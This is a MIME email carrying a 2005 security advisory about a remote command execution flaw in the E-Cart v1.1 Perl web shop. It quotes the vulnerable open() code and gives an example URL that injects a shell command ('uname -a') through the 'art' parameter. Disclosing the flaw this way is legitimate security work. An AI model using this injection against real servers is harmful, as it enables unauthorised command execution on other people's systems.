------=_Part_734_24926651.1114105332381 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D Title: E-Cart v1.1 Remote Command Execution Vulnerability discovery: SoulBlack - Security Research - http://soulblack.com.ar Date: 20/04/2005 Severity: High. Remote Users Can Execute Arbitrary Code. Affected version: <=3D E-Cart 2004 v1.1 Vendor: http://www.yazaport.com/kadfors/kwamd/mods/ecart/index.cgi =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D *Summary E-Cart is a mod of WepApp written in Perl. It is WebShop. =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D *Problem Description: The bug is in the file index.cgi where the variable art that is put under= =20 "open()", does not have a control of data, allowing to the attacker to execute any type of= =20 commands. Vulnerable code --------------- sub viewart { &cartfooter; open(DATA, "$catdir/$info{'cat'}/$info{'art'}"); hold(DATA); chomp(@data = =3D=20 <DATA>); release(DATA); close(DATA); ... ... ... =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D *Example: http://SITE/DIRTOECART/index.cgi?action=3Dviewart&cat=3Dreproductores_dvd&a= rt=3Dreproductordvp-ns315.dat|uname%20-a| =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D *Fix: Contact the Vendor. =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D -- SoulBlack - Security Research http://www.soulblack.com.ar --=20 I=F1aki Cormenzana=20 SoulBlack`s Staff Y3VhbmRvIHRlbmVtb3MgZWwgbWljcvNmb25vLCB0ZW5lbW9zIHNvdWwuLi4=3D ------=_Part_734_24926651.1114105332381 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline <br>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br> Title: E-Cart v1.1 Remote Command Execution<br> Vulnerability discovery: SoulBlack - Security Research -<br> <a href=3D"http://soulblack.com.ar">http://soulblack.com.ar</a><br> Date: 20/04/2005<br> Severity: High. Remote Users Can Execute Arbitrary Code.<br> Affected version: <=3D E-Cart 2004 v1.1<br> Vendor: <a href=3D"http://www.yazaport.com/kadfors/kwamd/mods/ecart/index.c= gi">http://www.yazaport.com/kadfors/kwamd/mods/ecart/index.cgi</a><br> =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br> <br> =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br> *Summary<br> E-Cart is a mod of WepApp written in Perl. It is WebShop.<br> =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br> *Problem Description:<br> <br> The bug is in the file index.cgi where the variable art that is put under &= quot;open()", does<br> not have a control of data, allowing to the attacker to execute any type of= commands.<br> <br> Vulnerable code<br> ---------------<br> sub viewart {<br> &cartfooter;<br> open(DATA, "$catdir/$info{'cat'}/$info{'art'}"= ); hold(DATA); chomp(@data =3D <DATA>); release(DATA); close(DATA);<br> ...<br> ...<br> ...<br> <br> =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br> <br> *Example:<br> <br> <a href=3D"http://SITE/DIRTOECART/index.cgi?action=3Dviewart&cat=3Drepr= oductores_dvd&art=3Dreproductordvp-ns315.dat|uname%20-a|">http://SITE/D= IRTOECART/index.cgi?action=3Dviewart&cat=3Dreproductores_dvd&art=3D= reproductordvp-ns315.dat|uname%20-a| </a><br> <br> =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br> *Fix:<br> <br> Contact the Vendor.<br> =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br> --<br> SoulBlack - Security Research<br> <a href=3D"http://www.soulblack.com.ar">http://www.soulblack.com.ar</a><br> <br> <br> <br>-- <br>I=F1aki Cormenzana <br>SoulBlack`s Staff<br>Y3VhbmRvIHRlbmVtb3Mg= ZWwgbWljcvNmb25vLCB0ZW5lbW9zIHNvdWwuLi4=3D ------=_Part_734_24926651.1114105332381--